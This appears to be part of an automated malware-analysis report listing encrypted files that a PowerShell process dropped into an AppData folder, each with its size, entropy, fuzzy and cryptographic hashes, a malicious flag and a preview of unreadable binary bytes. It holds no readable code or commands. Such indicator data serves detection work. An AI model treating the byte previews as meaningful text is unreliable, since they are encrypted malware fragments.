Preview:	k>.lo.?...._x&..2{.o.FU<%s..3v.2....&.C......6..a..<...~0Jq..f/..u6>..P....?@<...m0...g..N....4.S."...GV...4...............E.%...A.o-.e.....Z.&..1..{.N.G........Qs..3...[..D.......z4.. .Gl...m....M...zs..c'd..!.........a.$.QBi.J_.HE".-O.X........[#....g.V.=....6(.c.:..D...Yo..d..&P.....b?.3^..R..bL.d...(..H:..qf\...C..'.C2..k.;.)..S..Fm...("_....l..vs.\.S.".+.&.Ym.m_...[l ..2.q.g^....)..n...)..i......\|L.c;...0\|.....Cp.g. .C$.V.l.Y..Tm!.(^...#.4. I.:Z.+[...<$.K.>.dzcUHu..G......L...C#(..._!~.HR..L'..T....m'...V....;ib~.SE'.P_..Z...Y.5DO....`..s2#H..ZukqP.)q.A.<@..$.9.....8....,..I.51E.]o..m.N...Nl......2.k&K.....!.......<Ha y.......0{...>.H.I..O[.1.n...;hCE./.IA.!.....L.....t.... 1.]..fE..L..C.E..WJ...$.,u..B..4..._.......!.>.pa].A.}..t..obX_.g1...._....}...m<.d.8.......-k)O..........k..H.r.&....O......Y..u......#...v..q.W.+D.U..........b[..@.]B....Xi.-b. ?B8.....U.K......J.....+.B.c.b.A....\b.w\.'......A.....T.6FHV.O.y....`u.<.v5_..4U

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\QfLspAEMwytFNGOuI.ceByAKVIxn Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	120472
Entropy (8bit):	7.998692663466741
Encrypted:	true
SSDEEP:	3072:0yU2Obo1GdTYJ446zXf+LtnOjA736I5p8uJKlOYcZVFr:0y1Uo1IYJ446j+eVIo2l
MD5:	150CBA32885CCE1AAEE93A0EB19178CD
SHA1:	5BADD0895A07E84D672CD780325A31757478239D
SHA-256:	69DF243F4A3EADC0712A5C9028C388E1EB13C0590E8FADAED1846C006216E5DC
SHA-512:	337D708D5EFCF20F97761350824738622C7A73FA68A6DDA2952F8D08FFDD358D506D79515231962B3E2D692389EC2C8822C2DC4869B29CDB7F6B63C3B0B66FC7
Malicious:	true
Reputation:	unknown
Preview:	..@.\M.i..oJ.!I.Nk...s.,..w..&PI.v.,.v.R.6I.A.?{..[L..."p.W[..5.....l.G.'k.a..U.......qg..B.5...n.@...=.f%.........-u..BAC......`...Y..t.d...+i....._...Q\^..3`.M<.-....Z.;.z...e...\Z....y.=.k..;t.D&0.yY?.l.....w.%...-...f..j._Edz...S_.#it.....kB..O.......i(..8D-...:m...+..."cIU..`.^"..lts.!m@...G..9(6\|=#..G..}mN..Z.v.n<W..W@...U.r.7t...-.#......&.D...r...o......x.....hfWNTSj/0.5.f.o.....?U.[`,9.#.s..(@....KC?..o.......i....(...5.Y.=.cq(N.<.....y. .:_.-=..m1.4h!...6....RjZ..^)...R4.q~[%...P...C....d.T.+.IC..I....r...o.;...w9..\.[_M.d)..]7..).:....i..)(h..Hy&3..<HQ.T8.2{...Y..}~.#..t.E..w......R...K......@.o.\|...??{.\.L.../.\|.......Z&...$....}..I.a....18.vc.yIb. ....h../e.&.R.V........(.a\1.._0...1h.....{^......,(..+.z...C...+..zX,1.'..r..#Q...Y]...a.;.......s.S1}.$......r..mp.q..t...09P..q..g....5\y.L^-...V.. ..'.:a...F....ZS.h.<q.B(..-.).e.P0.?.i."A.3.[.F....:..Z..r..K/.A...._.....W..&\lm*Al..Y..4kf..y.....-x..}.....~1......

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\RdJiEbAhCkarnM.gRUvYCDKPhlSOIW Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	90372
Entropy (8bit):	7.997981337893421
Encrypted:	true
SSDEEP:	1536:58hLTQKAsq8txiBqAN9dqKL8u3IyWPBirD18qzYR6bSllcGOW8NhmEQzvmefn:58hL08QT9dYuYvBidtzYRhX82EheP
MD5:	A2CD5EBE94A37AE7A7EB9DC2D50558B7
SHA1:	798B6165CA1389157072BD523D702F40DDFA1CA7
SHA-256:	B1A59454691A7BE354401AC945B18F8C7072F53282382549211EADA29C6E45F2
SHA-512:	99E82D67AA97FDD2415CAF2439403A3ECF868E05062ACF95153F7FE911C9C056F2A2ABB58A55097B68DFA134F2C73B6852D31497BB08DD83B69919008B5932FA
Malicious:	true
Reputation:	unknown
Preview:	.......'(}....e.t......m..86I5{...0.tdT.R..}.^~.u............3.(u!$.R...23..p.L.[..jxY'.t.j.`.;T.=Z."..'.^..-.Q.0.B...9...pL.6....=I.}.P....G...R/....C!.EJ0.7.......I.!.^F0,...X..&.v...fX2...>fv5.n....eF......_>..S...9.....`.+T..6x0..'....:_W....%c.Q.. /:N.k.L.IPjU..O.@+.H....-tH.7'...YZ.\|/.w.\0M.:..%..PM....=.).kf..4C.\6#B......w.......w.l.9.3u.Q`.{v..c....9..n.'.KS3.c.)..]..k../..!...N..L.....u..,.<.L..yV_...t?..........6...Q.hm.".L>w.5A...~...On..Y.X..osPZ..+<`.RLS^f$nZ.}._...y......=...K.....-?>..0..6.8...C....K.....b....@U.U\|..............G../>...W.....up.W6.!.l...N.~...n..%=Q...);l..y...^.~..J%(......a.^KY.".N.0....>...M...........o....4Y.Xl.a.........on..JDd..U...pS7..P].U[..xo..8..Z@.....j.....Y.5{t..9...G......Z.e..hugq.i.VN.Y.:Wuzz......<.b:x....h..W.SM.....:/.....B..4P....e..Dv#m.T&..BI.(.k..0.&Mg...F..[.......r.n.z..^.T.q.)5....m...c.N.$H22R._D. .1.W.f.s.......\|.._o..9.".k.k.s...E...^n.f<D.3...2b..eI.K....%.t&.9cf8=..)...].y..

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\RmbDKTPvMuhsAeSqgL.IbiBASdKMJVtrzgsU Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	56429
Entropy (8bit):	7.996845082126711
Encrypted:	true
SSDEEP:	1536:kM60sgHuIZjD/PyLcbHM3Oqofa2OIq7PnVPvT+xA4:kp0POIZjDHjfa2InVPrk
MD5:	F90602503FB55132BDA52352DE64DF54
SHA1:	41A06CEDCE5DFAC2548B4F7C08B91D0B3C940F08
SHA-256:	F15D3CC3A2303A1C443D392BA2F0925056140BE5A2BFFFFBFDA71BC97AA47115
SHA-512:	709A322620D9A7B2A92D19D73822562D8DBB696884CF510483B349BBF93D64456CBEB77EDCAA437C08F20125CF01091CCD869E3AA450A5B12DBE02C8A7C533AC
Malicious:	true
Reputation:	unknown
Preview:	&'.....c.:....g..?..P7.MW{.C=8....3V....5S5.N.r..Y..N.O..Wo...S.v2.T4.......?.ie...)J.>....tW7....>.Y..Vkx.k.rO.%.utXM........~...+H]u_h..Q.1v.Nc..I5v...j.[..0.c.......vB.....!X._..@._..b.yK.g.6q..u.....J."../Li.&..!;,=..Wd.[OO^.....{..&.....>.g...!T.......C.J.WL=..q"'...eD9..f"K\|w<.v....M/..\|jk..9R....Y.'...f~!{....._.u.\.......-...4......O.SP.:...;.9B.?...NQR..Qt.?.F..T.:.}.....l.u.T..^o...........=..q.w.ta.......[M.....n..........j.&...6...0....@.tv....H6cT(..`..5..X..{..s.}...}4^.Y..H.K._Xd..Q.............Z+}....<F..".X..".4....{Q.....\|!..8a.....;../A`.....}e..b....SYm2./.-..~M.e0.e....=#m.f..}....,....^..........<jA.I.o.4..~.......F.7Zv..e...h.W.xJe._)4..wO4..>.Pt3..Ec.K...L.t.@Th.&.tP.1Z.tt.nNpi.M ...e..+2..x.b..%..H.j1NiZg........./..r$.r.iv..b).Qs..\ht...Mc.9..X5Z.........U.{.S8`RSjH...m.E.^.j...3.......t'N#.g.E....;H.h.{.W<y..tr.}.:^.F..J..O]~.....h.4hx.Z7..)]K..~..z..+.........y:}...8<... .<...3..z.......ay..L....

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\SDZadhsrOVItpu.dtjMHyWqnIQz Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	122526
Entropy (8bit):	7.998454304003695
Encrypted:	true
SSDEEP:	3072:k08Wei7pQ3MP7OSD+k/6QoSRtQna8j/bSEiA2tkXDlzb/0:kQec7O+/oSRtua8jzMteb/0
MD5:	9712982E1A658E32C431BB9CA2A1644D
SHA1:	1F933AE5666DFD18B6B1A603A7495B230941A81F
SHA-256:	654D3A5280AFEF7383CED14F406724CAF2C35CB64FF07F56A5044AAE4B3B0558
SHA-512:	390D3ECB09F182E1821AC9D28A397DA767CABAE72363FF403D8E116EBD4627C773D9234E3BFD550381B5433959ADA910B25E9DC43DD463FDCDA78E618B8EFEA2
Malicious:	true
Reputation:	unknown
Preview:	.."..6'u..=(.'..7?....#x45.Ev9.....6...~..{P..9.f..h....d.?0.N.r.u<.(.!.z.X........-...8lM.>..,.dK......p.sM.:p`{.D(c.].8.N.k+&<.8].%.c3........ib.. #_.....L...6...;.R.l.P.9.J8.z/...BALJ.o.W..}I&.&(....\|@.n.`........].>t..&FG...#m.R...<..5.E'[.;4..U.m8./..u6....=...H...\.b/a....V.N...h\.9...(Q.r.......&..+......n`..ES.9.v...(.\...).\^".d#\..D.......r..M".(..>..D~..../>.22..(.P.m0D.:....gVN..U.p........}I...Z..W...T{.7...]}......p...J1.....a.'...j.Z..Dr......{.b..J.fI......4K.Z..Y...f...gD?..t.....9..G.?...>:8k!..J1.....{.....;.# ..f!'...,....d.<.Y..Q.;`-.0..^H..{......EV..T..7....5.......-....s........3?....~....(.=..?)... \..~......R.....,.....r.....N..y?..A-..m.%...:..PB......E2....W...z{.w...'.T.P......m\|.5...8`......3C.qS.l.*..a...9K..k.{.{...?...@..........2...K.......].9.-..s....`....j.._q<-6.#..?@.C.S.E..K.Z....\.g.(..S._..9px.pNEX^4.S....1T1...'<.+0.g.96..L....("....1..-..1...36.'.........,s..{...-.[...r..g1....y..\..R....

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\SFWnDOXpNfKzsed.NCmZpjwdWKlvM Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	198345
Entropy (8bit):	7.998948802375123
Encrypted:	true
SSDEEP:	3072:u7IwijaJAaT/vUnuePfQj610M7xt3AELRnsOvY7OQrFRoDwSqls6fi+aBffHM3:6TEg/vUuGJygt3AqvvktRRoD5Gi+/
MD5:	90B3C2CF143F4317B12CBB3E568E85FB
SHA1:	BCAFE9A8ED513E1215BAD427E41086A13325502E
SHA-256:	26F4AA6D801ADFFA6E48E75EFABF99ED18986F038D336EFBB13E796A615ED105
SHA-512:	25A888A153F1045838CD51B3C1455C8B5277E2B0618F937E94FCE7317CDB8FD75FF1B20A3E6B25654A43D50BB254B1FBA51A381FA44B04E52B43E9F50C791D5B
Malicious:	true
Reputation:	unknown
Preview:	.j..ng..n?..A&.O....n...F.wt.....-W..=......P.[....h.-..'M..g..?.....q.m.R....h..,.qk.[G.e.i.....k...../....1..N;.]..A.-"........]U..0..p..O..4.l.x8v.......z<....LD...cg.Y.j...&../...~Wn\|y.D4z.`\| Umc..:.hzn.f`^.w....].fJ.Q}$..w7v.@.s........l.Hp...e..D..G..]7(......4.Og./.7.C....A..h./..D......E1.MC.U.g6`_.......OM.z~..w~..k..N5K.de.P...p.... U';........wn.R.[..1>.....NK}..qD..j.x.h.......?!..$.E.......a.......9@..G.....[..L[..S.a#...._....MO..[;0.Rh&..\|...U..R.....^d..R.......Z_..:\..y.......L..R..Os.....5.~.;..S..{...-...W.....>.......T..R...\|..$=.......q....I..E.....M.n..D5...!.......0...d5.8..%...6.q..;..........p.u..]F.d.E....j....<....Z........>...*.1><S......0.e.Oq.~...y...F.,.Adijh....J.d...r.......3u..&j..j...c.\|..L.)fB`r..._.:.Z)N...vJ.u.!`.U!...?...y3.me..Bo;.:0...._r.v>.R3......O.....k...$......i.......2=..ituG \A.9..W#..>.........T...P. <........@..g......y._.$......,.P>r...&@.Zv..(......YO;.......8.J.vi

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\SMURdTxctPayFw.JuYBpTvVhGcmbwDRysF Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	74726
Entropy (8bit):	7.997650035305442
Encrypted:	true
SSDEEP:	1536:fk2Wp7zK9oKnuVoe1ZNFlMZnIn2GTo6anjSvMhZDDZEDmZwpGtiI:fk2N9oKnuVn1ZBMGxnanmvMzD4DI
MD5:	CD63E136F77D2BD56F7435AAA89385A4
SHA1:	371F382A3B7474563B70EC64CC0B54AC1EFFCD3C
SHA-256:	8E8E174A82613E06652087A837DE03DFC1E306D574BECB7DC93821068BDE36A1
SHA-512:	D05ADD2D008D244C38CD9D983F8ADD12D7F18F02AACCC023F26DE16087025D77B3FC03058A748CCF2E54801C9AE065F13EF7061DC0516B8F7DD228CDE7A13A1F
Malicious:	true
Reputation:	unknown
Preview:	`Y..CtF...\|...q.......rV...]u...E..\|.P...I.l.......(....6a...7.F.]...f..r}..pl."...i....K..{f...>.`...A.k'30z.@]...v..}.......G.}.......L.g_.........\|5&o8..T..N.05g.w ..X`..Ij..q.x....z...sz..m.....).....%.....snG{......`..u.R!.....s.O.....{..........5Q......bi...x2..F...Kq....U.a..{.E.9..,I.._..x...u..s...8..Z.........Hq..x.^5......].w...,.....\|y... T....n^.H.1.<81...e.Hb. ...2...oY.X.<)q.<...vDH..wd......{...N#...p]..;J.%...o.s+SN5.c..Z.r....(.e...<.{\|..#...e..?i'...+...@..9.....i.:.z.......@=;....A..H.VR..i.e...A...4..P.._...J'Y_..yI-.OK1...P..n..OYYXNs....R..(...E...5.V....r.W...c..}.b.Y.Oc...o..bQt$.......8S.(.y"....%...m0..K.g.....dw......n;MM..X.NG..4......]O....]Q..:.9......}..=.../.r.b#.>.......D..U.j7..S.}_...-..c..dl....?]..+(U....s.T...r...Z..B<d.{."T,Jqn.R6..3S!......~..n......r>$k.G....n;.....S<.:.....ns.jJ....R.q..pC.'..2<...8RN..+.t.....H...o..2l?ea...rA...g...d\|.2..lR..&$........e.7..^$.VZ...#./..=w..X..M!.......

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\SNfqXWseACDYPwzQ.zZyeDbCsxNiEqo Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	93134
Entropy (8bit):	7.998131100577918
Encrypted:	true
SSDEEP:	1536:GxyKdzEzBLibGRM3Lr8K7mtOhBciX9JINOJOWezt2ccYsnHa7TmbAY:GsKByBxREr8K7SO7cEJhDeU6nmbAY
MD5:	4751E7F3F38DFC6CEA665CFCEAB5A6DD
SHA1:	28E881F5DB128D16847BCED8AA436892DA75555D
SHA-256:	B9874BCB6E91C4CE52CB7D7E3E5B2E759D645CE26C0373032B4B909E477476E9
SHA-512:	A0D4717457AFAB06B08CACA4C927D0E9275E1BF3A9E32EE359F0E40359DAE833C8C20BAFF0F0B3677287CF4B1BF72396532F492BF0023A8B55ACD1677FA2EFFC
Malicious:	true
Reputation:	unknown
Preview:	n...(`W../..:..T....G'$uc.}..o....\|)._.?....Bz..'....Gf..r.[.g[..-...4..>F..s..G.].Z5...........4^H..1. ....o...a..f..RG...x^$.-..`(,....%s2a.Ax......fK\.....U ...9t..Y.>.[.y...f.Q....F.'Li..A:...>.=h;_....."....._8..X..e.8.....b.m.(..4.......Z..)....z7.-&..........vI...gmSaF......[.u.......D.m'....~...H.F.&.e'....`.A.L...}%y.>/[q..h.....6.....Q.1...1x<.i#........P.._/.w...=..Sd...v...w........c..../..HG...MA..+.:a.d..}.&.QG.b.g+..F.X.0....M....R.....}..ol.D......yM..q4....9d.F.`<. .4.'..:.b}s.#F....dO~..Z..d..,E...D.W U..#...n.J..g.i.F...q..dP.gI3..\|..j\Z.8....i+.&..f...B.$(...]%kH.U.V.t-h}6@f.a9...n.....F4..u7v....5.f8..T.~g.4....C.d.s.@.K.....bV."..os..e.m..p....0q;].&.I}U7.{7"..t...-.f...\|c.^..^_...8..&.G[.c6..X+......O.R)...-...1.<...7.._u..Y>3..[FF@&..@.Q..F^.G..C.........3 w{.\|G.=Wm(-./>..nD.....}Q..#.f..............Mlw.z9~}+......d4....a[.G.k.q......bJ9,.}r....O.N..].H...2U.....m.j...d.pd.\|P.."......Fa.......Y]..e`K............

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\SrEmOPxnLhiZMV.HFSUjCIdGJzQbuaePhx Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	145102
Entropy (8bit):	7.99890361169074
Encrypted:	true
SSDEEP:	3072:ePMey5W+PX9B+ShNo9xuR1FCHlWPKq9mq66O8Hj:AWW+PrNo7uP2wY6zj
MD5:	A0EDA3E5925625FA3CBAF36D8B01BDA7
SHA1:	BB2DC83E77AB7A948B557AA45BD4F1030CF6C7D0
SHA-256:	B0D86FE67185FD34CB4AC704D676F13ADCFC0C7C09C32AB262934D3643AAEA08
SHA-512:	5651F886329C788776B1DF3DE8A09824D93BFDAD4E59507EC26AE3FC1FC86A0158C562D1127329A0A9702345CBE2A8D2EC7A71852BF5E42DF6C44180505806DB
Malicious:	true
Reputation:	unknown
Preview:	.X.......).A.....{....=..l.Q......<....s. .....2.f...SD.8..j9%.......a..j1^.\|.W...-....?}..).:.r.6.>...d.s."..B5q{V.D..S...h/J..F.......\oY.&......\|\|../{<.w...t...k7.]-U..LY...p..V....i.L...`.."..SX9RO'X.Z.j.M...d...p.Hk..q#.M....a..z.T...2.y`.....Q....5/.-z...?a/.k../..y..9..p#..P.c.4w$..g...!8..U._.E.("..X..w..lL.W....D ....{..jln.I.....^]...Q.:.Ca.o.$ 7.....a.H.....p..F.....D@Jel...)x.LQ..m.!S5...Y.(.`?.....w.<t.-..0.wzI.s..G..s.....(.\.H.-%.1.l%....V.o.......j(n.....r.M$.Bu>!..v.&.....-I!.....3Z...`J....&6...l[..2...69...c..K..^...."..V.....D.\H.OL....>.f.....J,....n...m.'...j.,Dk.g.^...G.?.N.{0(ln6..7._...j..?.Q.j.......`........K.'....T..<.Q....fx.1DX.u.\|..f..C.[.Ad.:.i...a...`$..Z. ..<..ni..\|...%.....(}......r..=C..z...`.1D\|MX,wL)...l..< ......?..>..Y.X)(Lw0.K.Q&..@sY..>.....&}=}....z..CV..R..S.w..\\|-.Z.;n.%..P..ts......2..Rg9..> ...X..g8$1......\.D`.fs.(.....uC.0.....5...,.a...q..M.0M?~1>.Ed.;.;B.+.t.y.}z.~.z..&...\|

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\SyMJFvukdbI.zDvmLxAPWaZdbjTiuI Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	66956
Entropy (8bit):	7.997063373495733
Encrypted:	true
SSDEEP:	1536:IUMZvPxHX7dOKoyAO79qvZDN4aRlCWeuLiUYcJYYp4hkRRFapIEGAF:OvZHXhOKoyAoa4aRlcuLbtNck3UpI8
MD5:	2245459C4F29B838837B222B73007BF8
SHA1:	55BF8F69F0C4186D99A83DA2659FEB3F0BDA78B0
SHA-256:	B886A21A6F1C151BD8C07E15FAE129993C190CCF9CCB2EE911495509CAAC021E
SHA-512:	E38008A3F398ABA9CD8CEBDE0EB505B9FE825EE188B1B0738E837668E0AD0E43927CFAB6105087F46000C600C39BDB8A451146560A6319D1C564F6FCC3A693DC
Malicious:	true
Reputation:	unknown
Preview:	f..QxA.d.D.....z.Z.=..t+...v.8..n...D0..IBei:....XS.d.q..Ii.k...>..aD.h).I\....R4a..P...%...........&.6.)..e..@\|.P...O...;..mc...)I..J....&..f..~..}.u.p.7r...Z....].Bz..(.....+.;C.y....#X?m`......!.s...L....IG.......h..".\|.c....;...A...\|_K....L.}3..R..T..H.+...N..C...h\ .....{...Q....ra.k.Q........ZK.2.HD.4......d".d.t..Z.?..R.r..I.5.d.........A\.b.,3tOYco63yK...7./kL.f.(7`......,....S.`..r.d....,^...SK..T.e.,......S.Wmk......D.....S........E.....G.jZ....L.. .l..&<gaq.J..-q.`.....yY......0.t.....`(h/s..`#.A..e..yG.vrP.d..aP..6h...I...e.HGrm%...w.:<....Y.#.....[..A..s....D.R;.^..+...~...UEVAf..<.<...+L..K...../Y..*....[......gvz.T.q.......m.PW.#?....q...M...ma.......%..9..4...(e..^....X..W...d........X7.0..[..D.~e].hd.-X.F%.GM....i....W}..>r....(.>.c..^`t..!.W...!.gWG..b....V..NZ.k.{...E[....L.....x.\o{nZ.O.E&i.`1...d...Z0..b.s!8.M.........<b.Hq.....?..eYl8..H.....y.1...}... ..VN.J.Uf3/..3.hd..]..Pf}j..6........].J.c........;..x.#./`v..#v.

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\TMRbfmnDHLQPiZhcgBu.QwDBFeylVjmri Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	174128
Entropy (8bit):	7.998961330309341
Encrypted:	true
SSDEEP:	3072:fNz0ufzvk20AJl6Okfu5t9D0a9eukIjNlGWBl5rEGeY5evwELkUsb1NKdFdXL:fNz0U820Acf09P9ZP4WBl5r3egI9L3sA
MD5:	9A980F83174804B9BDFF0875D5F59CFF
SHA1:	4B1E065AEB558FD0E6370D60605CD8CDF47F0D2B
SHA-256:	C1CB5111B0DB752B3C3A14FD8EE6E5E7C76492EC3BC3D1B6B51A04B0C6FCF570
SHA-512:	26392EC15F7C3B7C5F135C2C15D6FE40B8CFABD64AB825415A58D8A0B4B7FB300F513C1ABAEFE693756FC89F04AF619B4A96519CDD579E4E401CDD263C22416A
Malicious:	true
Reputation:	unknown
Preview:	.i..>V..y......C.C.P...`._k..k...p.]y.@..z.._k@.LUV..+b.c..m.S....%....]9Pb..E......E.E... I-.&..O\|...b.{\|...aG...{....H....0.)....k.#K....j.5..p?......j"../K.2x.~l5./G..t."...I..~/.,?...q!....O..Z...\|U-.......Z.2.u.?j..%...%....E.....+v.....$.KG...j.05.Ue-....r.0.....s..\...w..}@D.....h.b.<U!...._Y..A....mr..t..7>.{....Jf..}....^.LJ..A"n..h..m.........\|?....<p.<..9.$....rc.F_.....S..-..:,/.1.(.(...0.y.8@.xx...>..\........l1.....%.#3.nm..k.?..9].mI........b......Rz.SL'...,VW>...~p.<.M&[f.Ss6."I.../!".!k.......yC.m.I,..?r)..4.....\M..y......y(%.3.{.0b.ACW.)..+.+.s.R..Q s.kiUSj ..,.l7djB.u..Nx.GF>r.p.A{....Z..K^.?....IO^..$a.o..+..[M.@....@..9v...k?..\| ..../.R.M....6..d.b....H.r....*<;..F.v.WLJ"...%..j!........Q...U.h.Tf..H.{...A...?._).s.......8O.$U.\|t.e.N=.,7........S..^......;`..T}v........{<.y.......l...5...#+.32).\|h.f..Kt.Q...Q.g.7.TJn..d.P,ZFn.0..z.$;.+\|M......cn2....wX.H..4.c!......2C........K.VR6e....A.zq..l...S.U......>...

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\TnUQAapRFokScBVZr.HPrzCjKJLsWvleBnag Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	181938
Entropy (8bit):	7.999048211567387
Encrypted:	true
SSDEEP:	3072:b9w3VVG11taTZPtz6Q8pmyGufOLuGgVZdiaj0PShQgZhimsAuaHr3NPwN3/zvIyz:b+3PGru1kBoaZDj0PhgPYaHr3N+/zQyz
MD5:	62B1629044CCEC9E7F7F8CB4500A12BE
SHA1:	68DC91B7B30CFA00D0A38884955CADAD8646C795
SHA-256:	CF2F75F4D1CCD5805D7DD1DAFC672AFB5D26819E812729698E052715DE28DB92
SHA-512:	1CBFD415FCDCF3890870717F138D9B4865E675EA7C7D6F1830139B307AC5D9E406F660E89BABF4BDAB643F4BF9378F437611E6144121C5FB39F816DD1C3BBB5D
Malicious:	true
Reputation:	unknown
Preview:	>\|4..#.....A. ...m?....b.....q..........?}4..t.K..f.g.f.i.(...X........7.8.2v0w%..of..b.q.y.&..)n..y0.D...r..7....._..~0.6 ...g.f..\|...^.@..Q4.:..E2.r..\|O..b$p.q}..s.F....[...}..$<.4m....b5.....P.l...;.4..3..pK.\|.4.<...m..h.....l....=....+.OA..........Y.W>0...Se:.^.3.;}.....~.0...XGy..i...h.D..R!.g!.F..<.d.H.........Y..k.).u.f.........gD..o_...m.s..k1.1.....`-.x.5...F...:e.....L.......HF&..`ezO..u../....b....`...cMp.Q........u.%......C..^.A..$.....I3#.jwl2.b.Z.MIi8..........s^.....7....a.&q.vSA..`1I..rT".Z...^V...3...-..#;....8u...~.dC...5..yK.R..]:..-.O...>..a..A.-..T.&.v.........P...>.4;8.K.T...P._...(....4J...1...E.^l:..R..E...3.F.mp.d=$!..~...:'...\|q....].X<.T.4I..m9K3...._...J..S...,e9......\.~..7].I......Z..Y..{8.q\|4rC..;.Y..,gV...I._.....}t[.EB.f..e..(hK..v...U...G..u.zO.eA....S.F..P..IG .3z...Vk.Idu.IT..&\|..`..%..I.E%U.u..D.;.x.F..Cv.P.?..a.3..p.L..$.FZc9...l........U..V.qx_D.k:.....c..L.<.=....^{...y.........\?..\|m...qK....m..#WT;

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\TvLXNhIqtcnzymYkgPV.uwFKHPfpQLOJZnM Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	113526
Entropy (8bit):	7.9981771905885815
Encrypted:	true
SSDEEP:	1536:j8KomANEHTXeuDdkKy4//iN+15HBo3N8hzhQStJEkOvFlSgchtJLlNTt+tjznhA:j8Ko8eYEu/iGU4hQSw/tCLlJt+xzny
MD5:	9379561843B22A2C186A87775052F86C
SHA1:	BF43A64CF863407246D31138387E067DE26DD279
SHA-256:	42CF38874A0EB8CD2036B362D0056F41DCF8E649372D0A48F4B1FC2FB14404E0
SHA-512:	AA2F2C7B005312B081319053CD898C97925A719AA520AEBC817A044E3DB9E56C5FFD4E229B364749B9F45FFE5BA313751CF31C85827120DF39EEA347278EE624
Malicious:	true
Reputation:	unknown
Preview:	6.......U.r.....O.p\|....b&.[.....m........Xf.W._:];....C..Xa..Z...tv..]...C..&s.dz.W......^....`.^f6...u4..dG.....-.,M[...jfY.8..8.....Wc...j..G.....3..........W....."....=UI#..y\.h.....g.T........Ni.H.PhZq/....B7.-....t....qpr....]....O..P%......)..>.e..+........Y.C..Z..O].g...Iw.g....5.."Q..3\.^.lA.[Q.\|#6.(...g{..9..%N).FE....p..6..O)d]y....gP..(%tM.]1.`.P,..h.l.oh..K.&.....U.e.K=.......)......H<.P(...C..4..lIR......{Sv.....)T...$.@E....Amux...].~c+._.a...a.zq.a.^T.O..G5Qln:...\|...Jf.....n.._.y`^.y...Z)...f#A...e....Xn...oV.W.o..6M..( ..K{.Q....q.Lp. ...2.-.....V........;tO...#P....c.e....:..g_..IW`I..0.EE..G..0.~.:+.e.....h..n.......Ra ./.!....Di.m...#..A.8.gB..@#{ZM.zm...../g$..N;..%..D.......`.m....[].....v.Gc...J..H............pI..+.`y...d.H#.......1...D.\.z.........;c......\M...O...!w.....b....H.%Z.0..Awg.&8L..xT...94x...V..dS.:..,.b.-...F....4.e.6L.%U.U35...P.......B..9.1.P..jH.......s.=c.......sWRf..$..!.8S..6.........;...

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\UWOaDZcofuM.GROcgQwvjeE Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	98274
Entropy (8bit):	7.998071053097959
Encrypted:	true
SSDEEP:	1536:vNMG9DgafqQ4pdV29fpG4zXhOFNGM3aiS6CQXTKJ3idZ2jCyvbxf57J5XxeBfnxg:vNx8hQuaxlzX08kRbTcieCyzxf57J8fK
MD5:	69A86243D6631C6C6A843C8AAFE77AC4
SHA1:	3FC39A87D51DAFD43F17B59C364B0A94D0352B70
SHA-256:	B5F79CB494087D997E4435D7347AFB9BC1A8F763F766D4A784DCA74E2CDDF94C
SHA-512:	10A56BCC4BE514784C678389D98F4679ECEB4E7D5326092EC3603665F781B68889D7903B15816E0BA2091E8278251E5190A2548749814ABE08355E3BCF575B43
Malicious:	true
Reputation:	unknown
Preview:	.[.e......+UM..b.,...e...c.bV..2.R....O...-...^Z...g...o.{<.....e......\..8.k...in./..}$PO..Mv`6..TcB.C..Q..G...v.$O.is.\|.T...N...N..?j+,24..K(].R.G..x.NW...BSTE.0.z.#.7?.......{...'."...<9?.E........zi..7@.3F.W.........Mb..kr.$cc.5.=....V..+<p...m.......e..sk"b.AU..md...."&-s....q.8)!.P.....H...{...tz...8DT..k..........)Y....7a..S...(....Z.i;.z......I.Y..:..P,.r..^B.e..S....!.2...RL.k.5.....<.\|(...r.....e..X.D%I3.....,I..U~......W..r..e&....r...}....)..,....h.@.:i.D....!]ri....W8{.^...+...O%..i.8Gq......K.[z.../2V.@..........9.....u(.h..d...T....v:Xh..(..."....\|PL.....P..e.../.qZ.I..LT...].....V...M.4.om.1....2RA.....?..uu..%=...@}j.7...k._....&..3..n...".......j..G.[.g...........ih.............?...\..Z..m......~...}".....\|...Rh57.a...ID.+.$0+...N..,.........U.m..q.w_k.e.Yakq..l.O:...4C..r<[....